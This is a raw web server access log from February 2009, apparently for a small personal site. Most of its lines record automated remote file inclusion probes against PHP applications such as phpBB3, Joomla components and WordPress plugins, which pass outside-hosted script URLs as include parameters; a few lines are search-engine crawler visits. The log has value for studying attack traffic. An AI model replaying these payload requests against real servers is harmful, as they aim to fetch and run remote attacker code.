211.115.110.64 - - [05/Feb/2009:04:53:46 -0600] "GET /logs//include/lib.inc.php?site_path=http://sayphoto.net/bbs/include/fxid1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
211.115.110.64 - - [05/Feb/2009:04:54:06 -0600] "GET /logs/access_log.1219536000//include/lib.inc.php?site_path=http://sayphoto.net/bbs/include/fxid1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
67.76.163.60 - - [05/Feb/2009:04:54:40 -0600] "GET /logs/access_log.1212451200//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
222.231.47.130 - - [05/Feb/2009:04:54:42 -0600] "GET /logs/access_log.1210550400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 373 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
222.231.47.130 - - [05/Feb/2009:04:54:42 -0600] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 346 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
74.200.223.213 - - [05/Feb/2009:04:54:47 -0600] "GET /logs/access_log.1212451200/errors.php?error=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.820"
222.231.47.130 - - [05/Feb/2009:04:55:24 -0600] "GET /logs/access_log.1211328000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 373 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
217.75.209.39 - - [05/Feb/2009:04:55:36 -0600] "GET /logs/access_log.1211328000//skin/zero_vote/ask_password.php?dir=http://pronetec.com/images/.../id2.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
74.200.223.213 - - [05/Feb/2009:04:56:03 -0600] "GET /logs/access_log.1219363200/errors.php?error=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.820"
211.115.110.64 - - [05/Feb/2009:04:57:26 -0600] "GET /logs/access_log.1219536000//include/lib.inc.php?site_path=http://sayphoto.net/bbs/include/fxid1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
211.115.110.64 - - [05/Feb/2009:04:58:45 -0600] "GET //appserv/errors.php?error=http://sayphoto.net/bbs/include/fxid1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
211.115.110.64 - - [05/Feb/2009:04:58:48 -0600] "GET /logs//appserv/errors.php?error=http://sayphoto.net/bbs/include/fxid1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.115.110.64 - - [05/Feb/2009:04:58:49 -0600] "GET //appserv/errors.php?error=http://sayphoto.net/bbs/include/fxid1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
211.115.110.64 - - [05/Feb/2009:04:58:49 -0600] "GET /logs//appserv/errors.php?error=http://sayphoto.net/bbs/include/fxid1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.115.110.64 - - [05/Feb/2009:04:58:50 -0600] "GET /logs/access_log.1216944000//appserv/errors.php?error=http://sayphoto.net/bbs/include/fxid1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
211.115.110.64 - - [05/Feb/2009:04:58:55 -0600] "GET /logs/access_log.1216944000//appserv/errors.php?error=http://sayphoto.net/bbs/include/fxid1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
222.231.47.130 - - [05/Feb/2009:04:59:26 -0600] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 346 "-""libwww-perl/5.79"
66.249.67.180 - - [05/Feb/2009:05:01:02 -0600] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.180 - - [05/Feb/2009:05:01:02 -0600] "GET /tattoo/set2.htm HTTP/1.1" 200 2286 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
222.231.47.130 - - [05/Feb/2009:05:01:18 -0600] "GET /logs/access_log.1211328000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 373 "-""libwww-perl/5.79"
222.231.47.130 - - [05/Feb/2009:05:01:18 -0600] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 346 "-""libwww-perl/5.79"
222.231.47.130 - - [05/Feb/2009:05:01:19 -0600] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 351 "-""libwww-perl/5.79"
66.249.67.180 - - [05/Feb/2009:05:01:23 -0600] "GET /logs/access_log.1201824000 HTTP/1.1" 200 238885 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.75.209.39 - - [05/Feb/2009:05:02:46 -0600] "GET /logs/access_log.1209686400%20%20//skin/zero_vote/ask_password.php?dir=http://pronetec.com/images/.../id2.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
217.75.209.39 - - [05/Feb/2009:05:04:19 -0600] "GET /logs/access_log.1211328000%20%20//skin/zero_vote/ask_password.php?dir=http://pronetec.com/images/.../id2.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
80.67.19.103 - - [05/Feb/2009:05:04:44 -0600] "GET //join.php?DOCUMENT_ROOT=http://usharewarez.org.uk//log/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.808"
211.115.110.64 - - [05/Feb/2009:05:05:18 -0600] "GET /logs/access_log.1216944000//appserv/errors.php?error=http://sayphoto.net/bbs/include/fxid1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
211.115.110.64 - - [05/Feb/2009:05:05:18 -0600] "GET //appserv/errors.php?error=http://sayphoto.net/bbs/include/fxid1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
211.115.110.64 - - [05/Feb/2009:05:05:18 -0600] "GET /logs//appserv/errors.php?error=http://sayphoto.net/bbs/include/fxid1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.115.110.64 - - [05/Feb/2009:05:06:08 -0600] "GET /logs/access_log.1210377600//appserv/errors.php?error=http://sayphoto.net/bbs/include/fxid1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
72.30.78.236 - - [05/Feb/2009:05:07:17 -0600] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.78.236 - - [05/Feb/2009:05:07:17 -0600] "GET /logs/access_log.1211673600 HTTP/1.0" 200 347112 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
80.67.19.103 - - [05/Feb/2009:05:11:16 -0600] "GET /logs/access_log.1217721600//join.php?DOCUMENT_ROOT=http://usharewarez.org.uk//log/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.808"
80.67.19.103 - - [05/Feb/2009:05:11:16 -0600] "GET //join.php?DOCUMENT_ROOT=http://usharewarez.org.uk//log/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.808"
80.67.19.103 - - [05/Feb/2009:05:11:16 -0600] "GET /logs//join.php?DOCUMENT_ROOT=http://usharewarez.org.uk//log/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.808"
80.67.19.103 - - [05/Feb/2009:05:11:41 -0600] "GET /logs/access_log.1220054400//join.php?DOCUMENT_ROOT=http://usharewarez.org.uk//log/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.808"
77.234.201.88 - - [05/Feb/2009:05:12:20 -0600] "GET /authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.ictgateshead.org/xbare.jpg??? HTTP/1.1" 404 326 "-""libwww-perl/5.808"
222.236.47.182 - - [05/Feb/2009:05:14:09 -0600] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://clear.fileave.com/header.jpg? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
91.195.124.11 - - [05/Feb/2009:05:16:32 -0600] "GET /logs/access_log.1219536000//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.kosher.jewishideas.com/modules/respon.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
91.195.124.11 - - [05/Feb/2009:05:16:32 -0600] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.kosher.jewishideas.com/modules/respon.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
91.195.124.11 - - [05/Feb/2009:05:16:32 -0600] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.kosher.jewishideas.com/modules/respon.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.195.124.11 - - [05/Feb/2009:05:16:35 -0600] "GET /logs/access_log.1219536000//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://cccgj.org/media/htaccess.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
91.195.124.11 - - [05/Feb/2009:05:16:35 -0600] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://cccgj.org/media/htaccess.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.195.124.11 - - [05/Feb/2009:05:16:35 -0600] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://cccgj.org/media/htaccess.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
91.195.124.11 - - [05/Feb/2009:05:16:42 -0600] "GET /logs/access_log.1206662400//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.kosher.jewishideas.com/modules/respon.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
91.195.124.11 - - [05/Feb/2009:05:16:43 -0600] "GET /logs/access_log.1206662400//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://cccgj.org/media/htaccess.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
77.234.201.88 - - [05/Feb/2009:05:17:05 -0600] "GET /logs/access_log.1214784000/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.ictgateshead.org/xbare.jpg??? HTTP/1.1" 404 353 "-""libwww-perl/5.808"
77.234.201.88 - - [05/Feb/2009:05:17:06 -0600] "GET /authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.ictgateshead.org/xbare.jpg??? HTTP/1.1" 404 326 "-""libwww-perl/5.808"
77.234.201.88 - - [05/Feb/2009:05:17:06 -0600] "GET /logs/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.ictgateshead.org/xbare.jpg??? HTTP/1.1" 404 331 "-""libwww-perl/5.808"
77.234.201.88 - - [05/Feb/2009:05:17:12 -0600] "GET /logs/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.ictgateshead.org/xbare.jpg??? HTTP/1.1" 404 331 "-""libwww-perl/5.808"
77.234.201.88 - - [05/Feb/2009:05:17:13 -0600] "GET /logs/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.ictgateshead.org/xbare.jpg??? HTTP/1.1" 404 331 "-""libwww-perl/5.808"
77.234.201.88 - - [05/Feb/2009:05:17:13 -0600] "GET /authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.ictgateshead.org/xbare.jpg??? HTTP/1.1" 404 326 "-""libwww-perl/5.808"
77.234.201.88 - - [05/Feb/2009:05:17:13 -0600] "GET /authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.ictgateshead.org/xbare.jpg??? HTTP/1.1" 404 326 "-""libwww-perl/5.808"
77.234.201.88 - - [05/Feb/2009:05:18:17 -0600] "GET /logs/access_log.1216166400/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.ictgateshead.org/xbare.jpg??? HTTP/1.1" 404 353 "-""libwww-perl/5.808"
200.192.137.82 - - [05/Feb/2009:05:20:50 -0600] "GET /errors.php?error=http://www.kmt-s.ru/chid.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
200.192.137.82 - - [05/Feb/2009:05:20:52 -0600] "GET /logs/errors.php?error=http://www.kmt-s.ru/chid.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
200.192.137.82 - - [05/Feb/2009:05:20:55 -0600] "GET /logs/access_log.1218758400/errors.php?error=http://www.kmt-s.ru/chid.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
200.192.137.82 - - [05/Feb/2009:05:21:10 -0600] "GET /logs/access_log.1212192000/errors.php?error=http://www.kmt-s.ru/chid.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
81.52.143.16 - - [05/Feb/2009:05:22:25 -0600] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
200.13.253.154 - - [05/Feb/2009:05:23:42 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://jeticu.com/ktmlpro/includes/ktedit/web.txt????? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
200.13.253.154 - - [05/Feb/2009:05:23:44 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://jeticu.com/ktmlpro/includes/ktedit/web.txt????? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
203.147.0.48 - - [05/Feb/2009:05:23:56 -0600] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://caaaa.altervista.org/sc.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
203.147.0.48 - - [05/Feb/2009:05:23:56 -0600] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://caaaa.altervista.org/sc.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
74.36.117.160 - - [05/Feb/2009:05:24:01 -0600] "GET /authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.ictgateshead.org/xbare.jpg??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
209.172.33.230 - - [05/Feb/2009:05:25:48 -0600] "GET //?sIncPath=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 200 1243 "-""libwww-perl/5.812"
209.172.33.230 - - [05/Feb/2009:05:25:48 -0600] "GET /logs/access_log.1221004800//?sIncPath=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
209.172.33.230 - - [05/Feb/2009:05:25:48 -0600] "GET /logs//?sIncPath=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 200 117465 "-""libwww-perl/5.812"
209.172.33.230 - - [05/Feb/2009:05:26:08 -0600] "GET /logs/access_log.1218499200//?sIncPath=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
132.248.117.152 - - [05/Feb/2009:05:26:27 -0600] "GET /logs/access_log.1206230400/include.php?path%5Bdocroot%5D=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:05:26:27 -0600] "GET /include.php?path%5Bdocroot%5D=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:05:26:27 -0600] "GET /logs/include.php?path%5Bdocroot%5D=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
211.115.110.64 - - [05/Feb/2009:05:27:49 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://sayphoto.net/bbs/include/fxid1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
211.115.110.64 - - [05/Feb/2009:05:27:49 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://sayphoto.net/bbs/include/fxid1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
211.115.110.64 - - [05/Feb/2009:05:27:49 -0600] "GET /logs/access_log.1225929600//s_loadenv.inc.php?DOCUMENT_ROOT=http://sayphoto.net/bbs/include/fxid1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
211.115.110.64 - - [05/Feb/2009:05:27:57 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://sayphoto.net/bbs/include/fxid1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
211.115.110.64 - - [05/Feb/2009:05:27:57 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://sayphoto.net/bbs/include/fxid1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
211.115.110.64 - - [05/Feb/2009:05:27:57 -0600] "GET /logs/access_log.1225929600//s_loadenv.inc.php?DOCUMENT_ROOT=http://sayphoto.net/bbs/include/fxid1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
211.115.110.64 - - [05/Feb/2009:05:28:03 -0600] "GET /logs/access_log.1217462400//s_loadenv.inc.php?DOCUMENT_ROOT=http://sayphoto.net/bbs/include/fxid1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
211.115.110.64 - - [05/Feb/2009:05:28:10 -0600] "GET /logs/access_log.1217462400//s_loadenv.inc.php?DOCUMENT_ROOT=http://sayphoto.net/bbs/include/fxid1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
74.36.117.160 - - [05/Feb/2009:05:29:06 -0600] "GET /logs/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.ictgateshead.org/xbare.jpg??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
74.36.117.160 - - [05/Feb/2009:05:29:06 -0600] "GET /authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.ictgateshead.org/xbare.jpg??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
59.120.13.70 - - [05/Feb/2009:05:29:07 -0600] "GET /logs/access_log.1205366400//faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/society.crew/id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
59.120.13.70 - - [05/Feb/2009:05:29:08 -0600] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/society.crew/id.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.65"
59.120.13.70 - - [05/Feb/2009:05:29:09 -0600] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/society.crew/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
67.76.163.60 - - [05/Feb/2009:05:29:19 -0600] "GET /logs/errors.php?error=http://clear.fileave.com/header.jpg? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
67.76.163.60 - - [05/Feb/2009:05:29:20 -0600] "GET /errors.php?error=http://clear.fileave.com/header.jpg? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
75.101.197.88 - - [05/Feb/2009:05:29:37 -0600] "GET /robots.txt HTTP/1.1" 404 294 "-""YebolBot (Email: yebolbot@gmail.com; If the web crawling affects your web service, or you don't like to be crawled by us, please email us. We'll stop crawling immediately.)"
59.120.13.70 - - [05/Feb/2009:05:30:49 -0600] "GET /logs/access_log.1219017600//faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/society.crew/id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
203.147.0.48 - - [05/Feb/2009:05:32:37 -0600] "GET /logs/access_log.1215043200/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 367 "-""libwww-perl/5.79"
203.147.0.48 - - [05/Feb/2009:05:32:37 -0600] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
203.147.0.48 - - [05/Feb/2009:05:32:38 -0600] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
203.147.0.48 - - [05/Feb/2009:05:32:44 -0600] "GET /logs/access_log.1215043200/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 367 "-""libwww-perl/5.79"
203.147.0.48 - - [05/Feb/2009:05:32:44 -0600] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
203.147.0.48 - - [05/Feb/2009:05:32:45 -0600] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
203.147.0.48 - - [05/Feb/2009:05:32:52 -0600] "GET /logs/access_log.1215043200/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 367 "-""libwww-perl/5.79"
203.147.0.48 - - [05/Feb/2009:05:32:52 -0600] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
203.147.0.48 - - [05/Feb/2009:05:32:53 -0600] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
203.147.0.48 - - [05/Feb/2009:05:34:22 -0600] "GET /logs/access_log.1215216000/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 367 "-""libwww-perl/5.79"
203.147.0.48 - - [05/Feb/2009:05:34:23 -0600] "GET /logs/access_log.1215216000/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 367 "-""libwww-perl/5.79"
203.147.0.48 - - [05/Feb/2009:05:34:23 -0600] "GET /logs/access_log.1215216000/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 367 "-""libwww-perl/5.79"
132.248.117.152 - - [05/Feb/2009:05:35:52 -0600] "GET /logs/access_log.1215907200/include.php?path%5Bdocroot%5D=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:05:35:52 -0600] "GET /include.php?path%5Bdocroot%5D=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:05:35:52 -0600] "GET /logs/include.php?path%5Bdocroot%5D=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
203.147.0.48 - - [05/Feb/2009:05:36:02 -0600] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
203.147.0.48 - - [05/Feb/2009:05:36:02 -0600] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
132.248.117.152 - - [05/Feb/2009:05:36:39 -0600] "GET /logs/access_log.1213660800/include.php?path%5Bdocroot%5D=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
203.147.0.48 - - [05/Feb/2009:05:37:28 -0600] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
203.147.0.48 - - [05/Feb/2009:05:37:28 -0600] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
203.147.0.48 - - [05/Feb/2009:05:37:44 -0600] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
203.147.0.48 - - [05/Feb/2009:05:37:44 -0600] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
74.36.117.160 - - [05/Feb/2009:05:38:29 -0600] "GET /logs/access_log.1214784000/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.ictgateshead.org/xbare.jpg??? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
74.36.117.160 - - [05/Feb/2009:05:38:29 -0600] "GET /authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.ictgateshead.org/xbare.jpg??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
74.36.117.160 - - [05/Feb/2009:05:38:29 -0600] "GET /logs/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.ictgateshead.org/xbare.jpg??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
74.36.117.160 - - [05/Feb/2009:05:39:32 -0600] "GET /logs/access_log.1216166400/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.ictgateshead.org/xbare.jpg??? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
203.147.0.48 - - [05/Feb/2009:05:40:14 -0600] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
203.147.0.48 - - [05/Feb/2009:05:40:14 -0600] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
65.55.208.134 - - [05/Feb/2009:05:44:12 -0600] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.134 - - [05/Feb/2009:05:44:13 -0600] "GET /logs/access_log.1176163200 HTTP/1.1" 200 230264 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.134 - - [05/Feb/2009:05:44:15 -0600] "GET /logs/access_log.1203811200 HTTP/1.1" 200 297389 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
64.18.194.51 - - [05/Feb/2009:05:45:31 -0600] "GET /logs/include.php?path%5Bdocroot%5D=http://www.bankingvn.com.vn/hcm/modules/chi.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
64.18.194.51 - - [05/Feb/2009:05:45:31 -0600] "GET /include.php?path%5Bdocroot%5D=http://www.bankingvn.com.vn/hcm/modules/chi.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
